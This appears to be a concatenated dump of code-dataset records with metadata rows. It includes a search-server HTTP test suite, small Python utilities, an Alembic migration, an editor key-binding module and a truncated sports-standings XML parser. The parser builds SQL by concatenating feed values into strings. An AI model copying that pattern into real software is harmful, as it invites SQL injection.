                                data=docs_json.encode('utf-8'), headers={'Content-Type': 'application/json'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# read weighting
with open(self.example_dir + '/weighting.json', 'r', encoding='utf-8') as file_obj:
weighting_json = file_obj.read()
# search documents
response = requests.post(
'http://{0}:{1}/indices/test_index/search?query=search&search_field=text&page_num=1&page_len=10'.format(
self.host, self.port),
data=weighting_json.encode('utf-8'), headers={'Content-Type': 'application/json'})
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(5, data['results']['total'])
def test_put_node(self):
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(0, data['node_status']['partner_nodes_count'])
port = get_free_port()
# put node
response = requests.put('http://{0}:{1}/nodes/localhost:{2}'.format(self.host, self.port, port))
sleep(1) # wait for node to be added
self.assertEqual(HTTPStatus.OK, response.status_code)
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(1, data['node_status']['partner_nodes_count'])
def test_delete_node(self):
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(0, data['node_status']['partner_nodes_count'])
port = get_free_port()
# put node
response = requests.put('http://{0}:{1}/nodes/localhost:{2}'.format(self.host, self.port, port))
sleep(1) # wait for node to be added
self.assertEqual(HTTPStatus.OK, response.status_code)
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(1, data['node_status']['partner_nodes_count'])
# delete node
response = requests.delete('http://{0}:{1}/nodes/localhost:{2}'.format(self.host, self.port, port))
sleep(1) # wait for node to be deleted
self.assertEqual(HTTPStatus.OK, response.status_code)
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(0, data['node_status']['partner_nodes_count'])
def test_create_snapshot(self):
# get snapshot
response = requests.get('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# create snapshot
response = requests.put('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
sleep(1)
# get snapshot
response = requests.get('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_get_snapshot(self):
# get snapshot
response = requests.get('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# create snapshot
response = requests.put('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
sleep(1)
# get snapshot
response = requests.get('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# save snapshot
download_file_name = self.temp_dir.name + '/snapshot_downloaded.zip'
with open(download_file_name, 'wb') as f:
f.write(response.content)
# read snapshot
with zipfile.ZipFile(download_file_name) as f:
self.assertEqual(['raft.bin'], f.namelist())
def test_is_healthy(self):
# healthiness
response = requests.get('http://{0}:{1}/healthiness'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_is_alive(self):
# liveness
response = requests.get('http://{0}:{1}/liveness'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_is_ready(self):
# readiness
response = requests.get('http://{0}:{1}/readiness'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_get_status(self):
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(0, data['node_status']['partner_nodes_count'])
def test_metrics(self):
# metrics
response = requests.get('http://{0}:{1}/metrics'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
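A possible consolidation of the repeated per-document checks above, sketched as a plain helper (hypothetical, not part of the original suite; it assumes the same requests/json/HTTPStatus imports and the host/port attributes used throughout):

def assert_documents_status(test, doc_ids, expected_status, expect_fields=False):
    # Issue the same GET used by the tests above for each document id and
    # assert on the status code (and, optionally, the returned id field).
    for doc_id in doc_ids:
        response = requests.get(
            'http://{0}:{1}/indices/test_index/documents/{2}?output=json'.format(
                test.host, test.port, doc_id))
        test.assertEqual(expected_status, response.status_code)
        if expect_fields:
            data = json.loads(response.text)
            test.assertEqual(str(doc_id), data['fields']['id'])

# e.g. assert_documents_status(self, range(1, 6), HTTPStatus.OK, expect_fields=True)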
| 45.873921
| 120
| 0.636987
| 3,338
| 26,561
| 4.944578
| 0.068604
| 0.085429
| 0.053802
| 0.079612
| 0.849318
| 0.845562
| 0.832414
| 0.832233
| 0.827628
| 0.824114
| 0
| 0.01429
| 0.217499
| 26,561
| 578
| 121
| 45.953287
| 0.779831
| 0.073529
| 0
| 0.712291
| 0
| 0.005587
| 0.196375
| 0.001919
| 0
| 0
| 0
| 0
| 0.26257
| 1
| 0.064246
| false
| 0
| 0.041899
| 0
| 0.108939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e9bde223a3694ce4ea167ce271c7c8c4a6bc6975
| 1,607
|
py
|
Python
|
examples/strategy_comparison.py
|
JarbasAl/phonetic_matcher
|
82c3bd808e40e75086716bf12bf7a719b741e817
|
[
"Apache-2.0"
] | 2
|
2020-12-29T02:38:25.000Z
|
2021-01-15T05:48:56.000Z
|
examples/strategy_comparison.py
|
JarbasAl/phonetic_matcher
|
82c3bd808e40e75086716bf12bf7a719b741e817
|
[
"Apache-2.0"
] | null | null | null |
examples/strategy_comparison.py
|
JarbasAl/phonetic_matcher
|
82c3bd808e40e75086716bf12bf7a719b741e817
|
[
"Apache-2.0"
] | 1
|
2021-04-27T16:44:33.000Z
|
2021-04-27T16:44:33.000Z
|
import phonetic_matcher
# Match strategies powered by rapidfuzz
# https://github.com/maxbachmann/rapidfuzz
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.RATIO)
print(s) # 0.8751379985754986
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.PARTIAL_RATIO)
print(s) # 0.8418402777777777
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.TOKEN_SORT_RATIO)
print(s) # 0.8492120726495727
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.TOKEN_SET_RATIO)
print(s) # 0.9492120726495725
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.PARTIAL_TOKEN_RATIO)
print(s) # 0.9043402777777777
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.PARTIAL_TOKEN_SET_RATIO)
print(s) # 0.9043402777777777
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.PARTIAL_TOKEN_SORT_RATIO)
print(s) # 0.7679766414141413
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.QUICK_LEV_RATIO)
print(s) # 0.8751379985754986
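A small sketch building on the calls above: score one phrase pair under several strategies and report the best (assumes only the fuzzy_match/MatchStrategy API already demonstrated):

import phonetic_matcher
from phonetic_matcher import MatchStrategy

strategies = [MatchStrategy.RATIO, MatchStrategy.PARTIAL_RATIO,
              MatchStrategy.TOKEN_SORT_RATIO, MatchStrategy.TOKEN_SET_RATIO]
scores = {s: phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft", strategy=s)
          for s in strategies}
best = max(scores, key=scores.get)
print(best, scores[best])  # TOKEN_SET_RATIO scores highest (~0.949) per the outputs above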
| 53.566667
| 98
| 0.683883
| 172
| 1,607
| 6.156977
| 0.197674
| 0.240793
| 0.120869
| 0.15864
| 0.837583
| 0.784703
| 0.737488
| 0.737488
| 0.737488
| 0.737488
| 0
| 0.109413
| 0.226509
| 1,607
| 29
| 99
| 55.413793
| 0.742558
| 0.143124
| 0
| 0.64
| 0
| 0
| 0.140556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04
| 0
| 0.04
| 0.32
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7580037c9faeaa48fbf2654bef87eb4f7c5bc5d3
| 194
|
py
|
Python
|
torchero/utils/text/__init__.py
|
juancruzsosa/torchero
|
d1440b7a9c3ab2c1d3abbb282abb9ee1ea240797
|
[
"MIT"
] | 10
|
2020-07-06T13:35:26.000Z
|
2021-08-10T09:46:53.000Z
|
torchero/utils/text/__init__.py
|
juancruzsosa/torchero
|
d1440b7a9c3ab2c1d3abbb282abb9ee1ea240797
|
[
"MIT"
] | 6
|
2020-07-07T20:52:16.000Z
|
2020-07-14T04:05:02.000Z
|
torchero/utils/text/__init__.py
|
juancruzsosa/torchero
|
d1440b7a9c3ab2c1d3abbb282abb9ee1ea240797
|
[
"MIT"
] | 1
|
2021-06-28T17:56:11.000Z
|
2021-06-28T17:56:11.000Z
|
from torchero.utils.text.datasets import TextClassificationDataset
from torchero.utils.text.vectors import KeyedVectors, GLoVeVectors
#from torchero.utils.text.preprocessor import TextTransform
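Because of the re-exports above, downstream code can import these names from the package itself; a one-line usage sketch:

# Resolves through the package __init__ shown above.
from torchero.utils.text import TextClassificationDataset, KeyedVectors, GLoVeVectors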
| 48.5
| 66
| 0.876289
| 22
| 194
| 7.727273
| 0.545455
| 0.211765
| 0.3
| 0.370588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06701
| 194
| 3
| 67
| 64.666667
| 0.939227
| 0.298969
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
75947038c090de4e3a6957951852fa9f8e862cdb
| 700
|
py
|
Python
|
verilog/benchmarks_large/cam/generate.py
|
cliffordwolf/yosys-benchmarks
|
52ff6fa991f2ab509618d8aaad02f307aac78848
|
[
"0BSD"
] | 14
|
2018-10-08T05:08:54.000Z
|
2022-01-29T23:12:20.000Z
|
verilog/benchmarks_large/cam/generate.py
|
cliffordwolf/yosys-benchmarks
|
52ff6fa991f2ab509618d8aaad02f307aac78848
|
[
"0BSD"
] | 3
|
2019-02-27T15:16:50.000Z
|
2020-02-15T16:15:43.000Z
|
verilog/benchmarks_large/cam/generate.py
|
cliffordwolf/yosys-benchmarks
|
52ff6fa991f2ab509618d8aaad02f307aac78848
|
[
"0BSD"
] | 6
|
2019-02-04T20:16:49.000Z
|
2021-02-05T03:29:29.000Z
|
#!/usr/bin/env python3
import urllib.request
urllib.request.urlretrieve('https://raw.githubusercontent.com/alexforencich/verilog-cam/32a2b86b0b1fee22f975bf15a64432b60540ac0e/rtl/cam_srl.v', 'cam_srl.vh')
urllib.request.urlretrieve('https://raw.githubusercontent.com/alexforencich/verilog-cam/32a2b86b0b1fee22f975bf15a64432b60540ac0e/rtl/cam_bram.v', 'cam_bram.vh')
urllib.request.urlretrieve('https://raw.githubusercontent.com/alexforencich/verilog-cam/32a2b86b0b1fee22f975bf15a64432b60540ac0e/rtl/priority_encoder.v', 'priority_encoder.vh')
urllib.request.urlretrieve('https://raw.githubusercontent.com/alexforencich/verilog-cam/32a2b86b0b1fee22f975bf15a64432b60540ac0e/rtl/ram_dp.v', 'ram_dp.vh')
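The four downloads above differ only in the file name; an equivalent loop form (a sketch pinned to the same commit, not part of the original script):

import urllib.request

BASE = ('https://raw.githubusercontent.com/alexforencich/verilog-cam/'
        '32a2b86b0b1fee22f975bf15a64432b60540ac0e/rtl/')
for name in ('cam_srl', 'cam_bram', 'priority_encoder', 'ram_dp'):
    # Each RTL source is saved locally with a .vh extension, as above.
    urllib.request.urlretrieve(BASE + name + '.v', name + '.vh')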
| 87.5
| 176
| 0.847143
| 79
| 700
| 7.405063
| 0.316456
| 0.111111
| 0.164103
| 0.198291
| 0.82735
| 0.82735
| 0.82735
| 0.82735
| 0.82735
| 0.82735
| 0
| 0.147016
| 0.018571
| 700
| 7
| 177
| 100
| 0.704512
| 0.03
| 0
| 0
| 0
| 0.8
| 0.758112
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
759e0ff6e1c1902eb2803efea356010115b05890
| 2,991
|
py
|
Python
|
migrations/versions/6146e792cabf_change_pokemon_id.py
|
Matzexxxxx/Monocle
|
af2b1dd163a33c3ea3bb4bdacf37622df65f4b8e
|
[
"MIT"
] | 21
|
2017-11-08T12:56:31.000Z
|
2021-08-19T17:56:35.000Z
|
migrations/versions/6146e792cabf_change_pokemon_id.py
|
Matzexxxxx/Monocle
|
af2b1dd163a33c3ea3bb4bdacf37622df65f4b8e
|
[
"MIT"
] | 5
|
2017-12-16T10:11:35.000Z
|
2018-03-21T09:30:25.000Z
|
migrations/versions/6146e792cabf_change_pokemon_id.py
|
Matzexxxxx/Monocle
|
af2b1dd163a33c3ea3bb4bdacf37622df65f4b8e
|
[
"MIT"
] | 33
|
2017-12-11T12:30:42.000Z
|
2018-04-10T01:48:38.000Z
|
"""change pokemon id
Revision ID: 6146e792cabf
Revises: 436fca55d46a
Create Date: 2017-10-20 23:47:06.314713
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from sqlalchemy.dialects.mysql.mysqldb import MySQLDialect_mysqldb
# revision identifiers, used by Alembic.
revision = '6146e792cabf'
down_revision = '436fca55d46a'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
if isinstance(op.get_context().bind.engine.dialect, MySQLDialect_mysqldb):
op.alter_column('fort_sightings', 'guard_pokemon_id',
existing_type=mysql.TINYINT(display_width=3, unsigned=True),
type_=sa.SmallInteger(),
existing_nullable=True)
op.alter_column('gym_defenders', 'pokemon_id',
existing_type=mysql.INTEGER(display_width=11),
type_=sa.SmallInteger(),
existing_nullable=True)
op.alter_column('mystery_sightings', 'pokemon_id',
existing_type=mysql.TINYINT(display_width=3, unsigned=True),
type_=sa.SmallInteger(),
existing_nullable=True)
op.alter_column('raids', 'pokemon_id',
existing_type=mysql.TINYINT(display_width=3, unsigned=True),
type_=sa.SmallInteger(),
existing_nullable=True)
op.alter_column('sightings', 'pokemon_id',
existing_type=mysql.TINYINT(display_width=3, unsigned=True),
type_=sa.SmallInteger(),
existing_nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
if isinstance(op.get_context().bind.engine.dialect, MySQLDialect_mysqldb):
op.alter_column('sightings', 'pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.TINYINT(display_width=3, unsigned=True),
existing_nullable=True)
op.alter_column('raids', 'pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.TINYINT(display_width=3, unsigned=True),
existing_nullable=True)
op.alter_column('mystery_sightings', 'pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.TINYINT(display_width=3, unsigned=True),
existing_nullable=True)
op.alter_column('gym_defenders', 'pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.INTEGER(display_width=11),
existing_nullable=True)
op.alter_column('fort_sightings', 'guard_pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.TINYINT(display_width=3, unsigned=True),
existing_nullable=True)
# ### end Alembic commands ###
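Both upgrade() and downgrade() above repeat the same dialect check; a hypothetical refactor sketch would name it once (using only the imports already in the migration):

def _is_mysqldb():
    # True only when the migration runs against a mysqldb-backed MySQL engine,
    # mirroring the isinstance() guard used in upgrade()/downgrade() above.
    return isinstance(op.get_context().bind.engine.dialect, MySQLDialect_mysqldb)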
| 42.728571
| 79
| 0.617854
| 312
| 2,991
| 5.679487
| 0.233974
| 0.055869
| 0.073363
| 0.11851
| 0.805869
| 0.805869
| 0.747743
| 0.747743
| 0.734763
| 0.724605
| 0
| 0.027765
| 0.277499
| 2,991
| 69
| 80
| 43.347826
| 0.792226
| 0.099967
| 0
| 0.769231
| 0
| 0
| 0.094915
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
75a368905b656c7923974e1bdf54dda0dfe55583
| 3,477
|
py
|
Python
|
src/modules/vim_movement.py
|
Shermii/n-editor
|
5f5c5e2b1abe403f1ddc35de314303a1e34e99f9
|
[
"MIT"
] | 1
|
2020-09-01T22:22:09.000Z
|
2020-09-01T22:22:09.000Z
|
src/modules/vim_movement.py
|
Shermii/n-editor
|
5f5c5e2b1abe403f1ddc35de314303a1e34e99f9
|
[
"MIT"
] | 1
|
2021-12-31T00:25:29.000Z
|
2021-12-31T00:25:29.000Z
|
src/modules/vim_movement.py
|
Shermii/Nix
|
5f5c5e2b1abe403f1ddc35de314303a1e34e99f9
|
[
"MIT"
] | null | null | null |
import sys
import os
sys.path.append(os.path.abspath(f'{__file__}/../../'))
from widgets import bind_keys_from_conf
class VIM_MOVE_MODULE:
""" adds h j k l movement when Alt-i is pressed and disables it once Alt-i is pressed again """
def __init__(self, parent):
self.parent = parent
self.importable = True
def vim_move_standard(self, arg=None, key=None):
arg = arg.char.lower()
if (arg == "h"): self.parent.buffer.move_standard(key="Left")
elif (arg == "j"): self.parent.buffer.move_standard(key="Down")
elif (arg == "k"): self.parent.buffer.move_standard(key="Up")
elif (arg == "l"): self.parent.buffer.move_standard(key="Right")
return "break"
def vim_move_jump(self, arg=None, key=None):
arg = arg.char.lower()
if (arg == "h"): self.parent.buffer.move_jump(key="Left")
elif (arg == "j"): self.parent.buffer.move_jump(key="Down")
elif (arg == "k"): self.parent.buffer.move_jump(key="Up")
elif (arg == "l"): self.parent.buffer.move_jump(key="Right")
return "break"
def vim_move_select(self, arg=None, key=None):
arg = arg.char.lower()
if (arg == "h"): self.parent.buffer.move_select(key="Left")
elif (arg == "j"): self.parent.buffer.move_select(key="Down")
elif (arg == "k"): self.parent.buffer.move_select(key="Up")
elif (arg == "l"): self.parent.buffer.move_select(key="Right")
return "break"
def vim_move_jump_select(self, arg=None, key=None):
arg = arg.char.lower()
if (arg == "h"): self.parent.buffer.move_jump_select(key="Left")
elif (arg == "j"): self.parent.buffer.move_jump_select(key="Down")
elif (arg == "k"): self.parent.buffer.move_jump_select(key="Up")
elif (arg == "l"): self.parent.buffer.move_jump_select(key="Right")
return "break"
def mode_set_move(self, arg=None):
self.parent.buffer.mode_set(mode="move")
if (self.parent.buffer.mode == "move"):
self.parent.buffer.bind_key_with_all_mod("H", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("J", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("K", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("L", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("h", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("j", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("k", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("l", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
else:
self.parent.buffer.unbind_key_with_all_mod("H")
self.parent.buffer.unbind_key_with_all_mod("J")
self.parent.buffer.unbind_key_with_all_mod("K")
self.parent.buffer.unbind_key_with_all_mod("L")
self.parent.buffer.unbind_key_with_all_mod("h")
self.parent.buffer.unbind_key_with_all_mod("j")
self.parent.buffer.unbind_key_with_all_mod("k")
self.parent.buffer.unbind_key_with_all_mod("l")
bind_keys_from_conf(self.parent.buffer)
return "break"
| 49.671429
| 143
| 0.739431
| 588
| 3,477
| 4.059524
| 0.107143
| 0.108504
| 0.234604
| 0.134059
| 0.848345
| 0.848345
| 0.824466
| 0.808546
| 0.780897
| 0.737746
| 0
| 0
| 0.101237
| 3,477
| 70
| 144
| 49.671429
| 0.76384
| 0.025022
| 0
| 0.155172
| 0
| 0
| 0.041975
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.068966
| 0
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f939a9ce895629f189ff1ee15d8753a0bdf2914f
| 46,227
|
py
|
Python
|
stats/teamstanding.py
|
fearless-spider/python_playground
|
5150b2de09736d68558f4c159e110a7ebbe29bfc
|
[
"BSD-3-Clause"
] | null | null | null |
stats/teamstanding.py
|
fearless-spider/python_playground
|
5150b2de09736d68558f4c159e110a7ebbe29bfc
|
[
"BSD-3-Clause"
] | null | null | null |
stats/teamstanding.py
|
fearless-spider/python_playground
|
5150b2de09736d68558f4c159e110a7ebbe29bfc
|
[
"BSD-3-Clause"
] | null | null | null |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import traceback
from xml.sax import make_parser
from xml.sax.handler import ContentHandler
from statsfiles import live_files, schedule_files
from statsutils import find_value_in_array2args, find_value_in_array4args, path, debug, send_mail
from statsdb import db_open, db_close, get_stands, get_teams, insert_standings
__author__ = 'fearless'
class NBAHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '2')
elif name == 'nba-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name == 'wins' or name == 'losses' or name == 'games-back':
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'place':
self.group = name
self.type = ''
self.num = attrs.get('place')
self.num2 = ''
elif name == 'points-for-per-game' or name == 'points-against-per-game':
self.group = name
self.type = ''
self.num = attrs.get('points')
self.num2 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
elif name == 'conference-seed':
self.group = name
self.type = ''
self.num = attrs.get('seed')
self.num2 = ''
elif name == 'conference-games-back':
self.group = name
self.type = ''
self.num = attrs.get('games')
self.num2 = ''
elif name == 'eliminated-from-playoffs':
self.group = name
self.type = ''
self.num = attrs.get('eliminated')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'nba-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
            print(data)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name == 'wins' or name == 'losses' \
or name == 'games-back' \
or name == 'winning-percentage' \
or name == 'place' \
or name == 'points-for-per-game' or name == 'points-against-per-game' \
or name == 'win-loss-record' \
or name == 'streak' \
or name == 'conference-seed' \
or name == 'conference-games-back' \
or name == 'eliminated-from-playoffs':
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class WNBAHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '5082')
elif name == 'wnba-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name == 'wins' or name == 'losses' or name == 'games-back':
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'place':
self.group = name
self.type = ''
self.num = attrs.get('place')
self.num2 = ''
elif name == 'points-for-per-game' or name == 'points-against-per-game':
self.group = name
self.type = ''
self.num = attrs.get('points')
self.num2 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
elif name == 'conference-seed':
self.group = name
self.type = ''
self.num = attrs.get('seed')
self.num2 = ''
elif name == 'conference-games-back':
self.group = name
self.type = ''
self.num = attrs.get('games')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'wnba-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name == 'wins' or name == 'losses' \
or name == 'games-back' \
or name == 'winning-percentage' \
or name == 'place' \
or name == 'points-for-per-game' or name == 'points-against-per-game' \
or name == 'win-loss-record' \
or name == 'streak' \
or name == 'conference-seed' \
or name == 'conference-games-back':
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class CBKHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '128')
elif name == 'cbk-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name == 'wins' or name == 'losses':
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'place':
self.group = name
